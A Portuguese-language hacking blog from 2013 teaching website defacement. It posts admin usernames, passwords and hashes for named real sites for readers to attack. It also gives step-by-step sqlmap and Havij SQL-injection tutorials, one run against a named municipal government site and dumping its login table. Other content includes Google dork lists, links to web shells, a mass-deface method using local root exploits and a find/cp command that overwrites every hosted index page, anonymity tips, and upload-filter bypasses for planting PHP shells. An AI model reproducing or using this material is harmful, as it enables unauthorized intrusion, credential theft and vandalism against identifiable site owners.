segunda-feira, 28 de janeiro de 2013

..::SITES VULL PRA DEFACE COM LOGIN E SENHA::..

primeiro site pra galera como prometido'

obs: eu não vou invadir os sites isso fika por conta de vcs eu pego o admin e senha e vcs se divertão ;)
 

site:www.dkggroup.com/main.php?id=121

db:+---------------+
| sessions      |
| uvp_Languages |
| uvp_Pages     |
| uvp_Users     |
+---------------+

password:+----------------------------------+
| Password                         |
+----------------------------------+
| 462d9cebb6479dbf66d1b965b10181a7 | senha cript md5
+----------------------------------+
username : admin


bom como prometido aki ta mais um site vull

 http://www.les-echecs.com/administration/
 

login: meilhak
 

senha: processeur 

só logar e se divertir *-* 


OUTROO 

http://www.elcoma.com.br/

LOGIN : ADM

SENHA :  192cc121f8b612ffc614bcfc62528339




..:::COMO USAR O HAVIJ:::..

                                                       BLLZ GALERA
bom hooj ' vou mostar como usar o havij pra escaniar sites ! porem o havij é uma ferramenta muito fraca ' pelo menos eu acho ..


abre o google e joga umas deessas dorks no google

  about.php?cartID=
    accinfo.php?cartId=
    acclogin.php?cartID=
    add.php?bookid=
    add_cart.php?num=
    addcart.php?
    addItem.php
    add-to-cart.php?ID=
    addToCart.php?idProduct=
    addtomylist.php?ProdId=
    adminEditProductFields.php?intProdID=
    advSearch_h.php?idCategory=
    affiliate.php?ID=
    affiliate-agreement.cfm?storeid=
    affiliates.php?id=
    ancillary.php?ID=
    archive.php?id=
    article.php?id=
    phpx?PageID
    basket.php?id=
    Book.php?bookID=
    book_list.php?bookid=
    book_view.php?bookid=
    BookDetails.php?ID=
    browse.php?catid=
    browse_item_details.php
    Browse_Item_Details.php?Store_Id=
    buy.php?
    buy.php?bookid=
    bycategory.php?id=
    cardinfo.php?card=
    cart.php?action=
    cart.php?cart_id=
    cart.php?id=
    cart_additem.php?id=
    cart_validate.php?id=
    cartadd.php?id=
    cat.php?iCat=
    catalog.php
    catalog.php?CatalogID=
    catalog_item.php?ID=
    catalog_main.php?catid=
    category.php
    category.php?catid=
    category_list.php?id=
    categorydisplay.php?catid=
    checkout.php?cartid=
    checkout.php?UserID=
    checkout_confirmed.php?order_id=
    checkout1.php?cartid=
    comersus_listCategoriesAndProducts.php?idCategory=
    comersus_optEmailToFriendForm.php?idProduct=
    comersus_optReviewReadExec.php?idProduct=
    comersus_viewItem.php?idProduct=
    comments_form.php?ID=
    contact.php?cartId=
    content.php?id=
    customerService.php?****ID1=
    default.php?catID=
    description.php?bookid=
    details.php?BookID=
    details.php?Press_Release_ID=
    details.php?Product_ID=
    details.php?Service_ID=
    display_item.php?id=
    displayproducts.php
    downloadTrial.php?intProdID=
OBS: NÃO ACHEI O LINK PRA BAIXAR ELE EU TENHO FAZ UM TEMPO JÁÁ !! DESCULPA !

Aqui tem mais dorks 
http://pastebin.com/iAA7Ptnw

bom depois de achar o site vull abre o havij e coloca o site que vc escolheu em TARGET e aperte em ANALIZE depois de uns 20 segundos o havij vai te da a DB do site então vc vai em TABLES ai vai em GET TABLES e vai começa ANALIZA as TABELAS  do site ai escolhe uma tables e clica em GET COLUMNS vc tenq achar uma coluna mais u menos assim USUARIO E SENHA ai clica em GET DATA ai vai te dar o login e senha do site .

AI VC PERGUNTA EA PAGINA DE ADMIN CALMA O HAVIJ TEM UMA FERRAMENTA PRA ACHAR A PAGINA DE ADMIN VC PRECISA IR EM " find admin" la vc coloca o site e talvez acha a pagina de admin do site..

PRONTO É ISSO !! BY LUC4S - DEFACE

sábado, 26 de janeiro de 2013

..:::ALGUMAS SHELL:::..

Ai galera um site com algumas Shell pra se divertir http://www.r57.gen.tr/ tem varias shells aii !! 

( use com moderação ) ;)

..::coisas sobre deface::..

Primeiro vou encinar a fazer o MASS DEFACE >

Antes, é necessário saber de algumas coisas: em um servidor, os sites são divididos entre usuários. Cada usuário tem permissões para realizar ações (chmod) nos diretórios que lhe é aplicado.
Claro que você consegue, apesar de bem raro, encontrar servidores onde você tem privilégios em todos os sites ali hospedados, mas em geral isto não ocorre.
Mas há um usuário que possui todos os privilégios: o root.
O que aqui veremos é utilizado logo após a exploração de uma vulnerabilidade e upload de shell. Use sua predileta, como SymbShell, C99 etc.
Vamos primeiramente descobrir que versão de Kernel está rodando ali. Então, vamos rodar o comando (bash):

Código:
uname -a
Várias shells (inclusive as duas citadas aqui) conseguem executar comandos. Você também pode executá-los pelo PHP usando funções como shell_exec() e system().
Com a versão do Kernel em mãos, vamos ver se já há exploits (XPL) para ter o acesso root. Estes são exploits específicos para escalar privilégios, e são também chamados de “local root exploit” ou “local script”. Você consegue encontrar esses exploits em sites como Remote-Injection, exploit-db, inj3ct0r e até mesmo no Google. Vamos usar, por exemplo, este aqui.
Claro que as versões mais recentes do kernel não possuem XPL’s ainda.
A maioria dos XPL’s são desenvolvidos em C. Por isso, após baixar o seu exploit, você deverá compilá-lo. Você pode utilizar o gcc se usa Linux, mas há vários para Windows.
Com o arquivo compilado em mãos, utilize sua shell para enviá-lo ao servidor. Agora, vamos usar uma função existente na maioria das shells de fazer a conexão por seu terminal de comandos (ou M$-DOS) – Bind Shell Backdoor. Conecte-se à sua maneira, podendo ser via conexão reversa (minha predileta) ou direta.
Feito isso, você provavelmente estará com seu terminal ou CMD conectado ao servidor, usando telnet ou netcat. Agora, ainda no terminal, execute o seu XPL, usando ./nome-do-arquivo. Após exercer sua função (escalar privilégios), o XPL fechará automaticamente, voltando o sistema à recepção de seus comandos. Vamos ver se conseguimos. Digite o comando ‘id’ e confira se o resultado (segunda linha) foi parecido com esse:

Código:
root@***:/home/***/public_html# id
uid=0(root) gid=0(root) grupos=0(root)
Se isso ocorreu, você já é root. Navegue pelos arquivos mais importantes do servidor. Você “poderá” fazer qualquer coisa ali, inclusive nosso mass deface prometido.
Mass deface significa “desfiguração em massa”, e nada mais é do que ownar todos os sites hospedados naquele servidor.
Primeiramente vamos ver quais sites iremos atacar. Vamos utilizar o serviço fornecido pelo On The Same Host (lembrando que ele não é o único que faz isso). Ali digitamos o endereço do site em que upamos a shell (exemplo: site.com.br – sem o WWW). Vemos algumas informações e a lista com todos os sites ali hospedados.
Então, agora é a melhor parte da história. Envie sua defacepage para o servidor usando sua Web Shell e guarde o caminho físico completo dela. Por exemplo:
/home/***/public_html/defacepage.html
D:\Inetpub\***\public_html\defacepage.html
Saiba também o diretório onde estão os sites hospedados. Podem estar em /var/www, /home/, enfim, varia muito de servidor para servidor. Mas use o bom-senso e fica fácil encontrá-lo.
Simplesmente volte ao seu terminal e rode:

Código:
find /diretorio-onde-estao-os-sites-hospedados/ -name "index.*" -exec cp caminho-da-sua-defacepage {} \;
Por exemplo: se os sites hospedados estão em /home/ e sua defacepage em /home/site.com/public_html/defacepage.html você fará:
Código:
find /home/ -name "index.*" -exec cp /home/site.com/public_html/defacepage.html {} \;
Agora, visite um dos sites que vimos no On The Same Host e veja sua maravilhosa defacepage.
Você também pode utilizar scripts automáticos de mass deface no lugar do find, como este aqui. Entre as vantagens, estão algumas estatísticas do seu deface. Para isso, basta upá-lo pela web shell e executá-lo pelo terminal logo após escalar privilégios.
Até logo!

 COMOO FAZER UM DEFACE COM SEGURANÇA> 


Para ganhar o anonimato na rede, utilizamos Proxy, Tunnel/Tunneling e Mac Mascarada.

Irei citar aqui alguns tópicos como referência:

Proxy:

Por que usar Proxy?

Simples, ele praticamente "muda" seu ip, tornando mais difícil sua localização.

Tunnel/Tunniling:

Porque usar Tunnel?

Idem ao proxy, pois você acessa outros sites via o site do tunnel, sendo assim, tendo o IP "trocado".

Bom, a vários pela rede. O que irei citar é:

www.freetoview.net

Se alguem tiver mais algum para a lista só postar que edito e acrescento.
Se quizer mais tunnel para acesso, use o google para procura.




Mascarar a Mac:

Porque Mascarar a Mac?

Mac, o que vem a ser Mac?
Mac é o endereço físico de seu computador, é a impressão digital dele (=P), tendo acesso a ela, obviamente tera acesso a seu PC.


Como mascarar sua Mac

Seguindo tais procedimentos, vc estara protegido, não 100%, mas com uma porcetagem boa de segurança. Obviamente que se invadido algum site governamental, de bancos e etc, o risco de sua localização é maior.

Usem com moderação.

quinta-feira, 17 de janeiro de 2013

SQL INJETION - DEFACE

Bom,Primeiro passo é encontrar um Site Vulnerável. E pra isso Usaremos DORKS

DORKS,são endereços aos quais você associa ao Google,Procurando sites Vulneráveis!

      LISTA DE 7 MIL DORKS http://pastebin.com/iAA7Ptnw  


Após abrir um site,depois de Jogar algumas dessas DORKS no Google,Você Vai ter que "Testar" Pra ver se o link é vulnerável;

Para isso você vai por o sinal de aspas (') no final da URL.Se for Vulnerável você vai se deparar com um erro,

Parecido com esse ( You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 )

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



Bom achamos um Site Vulnerável...

Agora vamos para o SQLMAP



1° Baixe o SQLMAP
link: http://sourceforge.net/projects/sqlmap/files/sqlmap/0.9/sqlmap-0.9.zip/download
Extraia o arquivo, Para o C: (Para mim fica mais fácil).



Após baixar e Extrair,baixe o Python 2.7: (Necessário para rodar o SqlMap) 
 
Após ter Instalado o python 2.7.vamos Usar o SQLMAP!



Se você extraiu o sqlmap para o C: ,usaremos os Seguintes Comandos com o Prompt De Comando. (Comandos Grifados)



C:\Documents and Settings\Admin>cd \



C:\>cd sqlmap



C:\sqlmap>sqlmap.py -u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 --dbs (esse comando "--dbs" listará as DBS existentes)



Após isso vai aparecer, as DBS existentes.

----
[*] information_schema
[*] siteubt
[*] test
----
Ok,temos as DBS;eu costumo ir marcando tudo em um txt.
Agora vamos Procurar a DB que o site está usando,usaremos o seguinte comando.



C:\sqlmap>sqlmap.py -u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 --current-db (esse comando "--current-db" vai listar a DB que o site esta usando.



---

current database: 'siteubt'
---
Pronto sabemos que a DB que está sendo suada é siteubt



Agora vamos Listar as tabelas existentes nessa DB,então usaremos o seguinte comando.



C:\sqlmap>sqlmap.py -u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 -D siteubt --tables (esse comando "-D siteubt --tables","-D" especifica a DB e "--tables" vai listar as tabelas.



+-----------------+

| a3_questionario |
| agenda |
| agentes |
| anexos |
| brinq_cad |
| brinq_freq |
| cad_edital |
| cad_edital2 |
| ccz |
| concurso |
| concurso2 |
| concurso_emdurb |
| dias |
| documento |
| dperiodo |
| esportes |
| falacidadao |
| foto |
| foto_hab |
| foto_pag |
| foto_san |
| fotos |
| frotas |
| galeriafotos |
| guiasn |
| infoccz |
| issretencao |
| itbi |
| licit |
| log_setor |
| login |
| login2 |
| logs |
| luos |
| menu |
| noticias |
| notluos |
| obras |
| pagina |
| pbairros |
| pcidade |
| pescola |
| pfamilias |
| pidoso |
| pidososinfo |
| pmedicamento |
| pmedutil |
| pmhis |
| pmsb |
| pservsaude |
| pssaudeutil |
| rh1 |
| rh2 |
| secretarias |
| servicosocial |
| tipo |
| tipo2 |
| tipo_hab |
| viaiptu |
+-----------------+



Pronto,ai temos as tabelas, Agora partir dai procuraremos uma tabela que seja de nosso interesse,como exemplo, uma que podemos usar para Logar no site,digamos,coisas preciosas... No caso vemos ali 3 tabelas que podem sem do nosso interesse.




---

log_setor
login
login2
---



Bom agora vamos listar as tabelas,e vamos ver as colunas que tem nelas,Usaremos o seguinte comando.



C:\sqlmap>sqlmap.py -u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 -D siteubt -T login --columns (esse comando irá listar as colunas dentro da tabela "login")



Nos deparamos Com as seguintes colunas.



+----------+-------------------------------+

| Column | Type | 
+----------+-------------------------------+
| codlogin | mediumint(8) unsigned |
| login | varchar(100) |
| senha | varchar(120) |
+----------+-------------------------------+



login e senha...iremos dar um DUMP neles....Então usaremos o seguinte comando.(Lembrando que eu vou anotando todos os resultados que consigo em todo esse procedimento)



C:\sqlmap>sqlmap.py -u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 -D siteubt -T login -C login,senha --dump (esse comando "--dump" mostrara os resultados que tanto queremos '-' )



Se você quer explorar muito o site,dump em todas as tabelas de todas as DBs =D



Bom nesse procedimento usamos os Seguintes comandos...



***COMANDOS***

sqlmap.py --url *************** --dbs
sqlmap.py --url *************** --current-db
sqlmap.py --url *************** -D 'databasedosite' --tables
sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite' --columns
sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite" -C 'colunasdosite' --dump



************ é o site que você vai invadir

Nas colunas não se esqueça de separar por , [virgula] ex. usuario,senha --dump



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



Ok,por exemplo,se conseguirmos Logins e senhas de administradores do site,vamos precisar,Procurar uma area de LOGIN para efetuar o deface. Eu uso o ACUNETIX pois ele lista as pastas que estão no site.



LINK: http://www.acunetix.com/vulnerability-scanner/download.htm

OBS: Acunetix é bom que ele é uma ferramenta que procura falhas no site,com sorte,você pode encontrar diversas falhas escaneando um site com o acunetix.



Ok,após logarmos no site,o que temos a fazer,e encontrar uma área de Upload,e fazer upload de nossa shell...Com a shell podemos alterar o site.



Certos sites,recusam fazer upload de arquivos .php , Como a shell é .php , temos que burlar o upload, faremos da shell, JPG, como se fosse imagem,o que tem que fazer é mudar de .php para .php.jpg , assim taremos upando a shell como imagem.



Existem várias formas de se burlar sistemas de upload de imagens em sites.

Nesse tutorial vou explicar os mais conhecidos métodos e é claro, os melhores métodos.
O porque de nós querermos burlar o sistema, é facil, nós queremos burlar ou para colocar um outro tipo de extensão ou ter algum privilégio no site ou no servidor onde ele está hospedado.
Para termos algum tipo de privilégio, nós teremos que upar uma shell, no caso em PHP ou em C, que será demonstrado nesse tutorial.
Quando você vai upar uma shell em PHP em um sistema de upload de imagens .jpg, ele através do filtro de extensões, ele vai te dar um aviso de que não é possível fazer upload desse arquivo.
O que temos que fazer é descobrir porque ele não nos dá essa permissão.
A primeira coisa que temos que verificar é se ele pega apenas a primeira extensão depois do primeiro ponto (.), por isso iremos tentar upar nossa shell da seguinte forma renomeando o arquivo:
Exemplo:
minhashell.jpg.php
Assim ele seria reconhecido como um arquivo PHP, pois a real extensão é .php.



Na maioria das vezes essa técnica funciona, mas é claro que tem sites que não irão aceitar isso, por isso iremos tentar de outra forma.

Alguns sites pegam apenas a última extensão do arquivo, mas apenas reconhecem a primeira extensão depois do ponto, assim nós podemos upar a shell da seguinte forma:
Exemplo:
minhashell.php.jpg OU minhashell.jpg.php
Assim ele seria reconhecido como um arquivo PHP, pois a extensão real é jpg, mas como é eliminada a segunda extensão, então ele seria renomeado pelo filtro para um arquivo .php.



Um outro tipo de filtro vulnerável é o filtro em que se pode anular a última extensão através de um comando null antes da última extensão.

O arquivo renomeado ficaria assim:
Exemplo:
minhashell.php.jpg OU minhashell.jpg. php
O filtro iria aceitar o arquivo por ele ser uma extensão .jpg, porém como à um comando anulando a última extensão, então ele reconheceria o arquivo como .php apenas.



A maioria dos sistemas de upload reconhece apenas a extensão do arquivo, mas não o tipo de arquivo, isso é muito perigoso para o servidor, pois um arquivo pode ter uma extensão .jpg mas ser um arquivo do tipo PHP.

Com isso o arquivo terá uma extensão .jpg e será hospedado no servidor, mas através de um exploit, ele pode ser renomeado ou você pode modificar um arquivo JPG com linhas em PHP com um editor hexadecimal, mas na maioria das vezes o arquivo corrompe, ficando assim impossibilitado de seguir qualquer comando estabelecido por você.



Outro caso é que o servidor apenas reconhece o tipo de arquivo, mas não a extensão.

Um modo de mudar essa situação é usando o edjpgcom, um software próprio para fazer esse tipo de modificação em arquivo JPG.



A primeira coisa que você vai fazer é criar um pasta chamada jpg no seu C:\ e extrair esse arquivo nessa pasta.

Agora abra o CMD (prompt de comando).
Agora dê um
Exemplo:
cd c:\jpg
Dê o seguinte comando agora:
Exemplo:
edjpgcom.exe suaimagem.jpg
Irá aparecer uma janela e no campo de texto terá um texto, remova esse texto e ponha sua linha de comando em PHP, que será sua shell/exploit e salve.
Não coloque comandos muito grandes, pois irá corromper o arquivo, ponha apenas algumas linhas (a shell c99 não funciona nesse caso pois ela é grande).
Agora renomeie o arquivo para .php e faça upload pelo sistema de upload do site e pronto, não irá mais aparecer aquele erro de "Invalid file Dimensions".





Ou podem fazer do seguinte modo ;

Exemplo:
GIF89a;
<?php
/* r57 shell here */
?>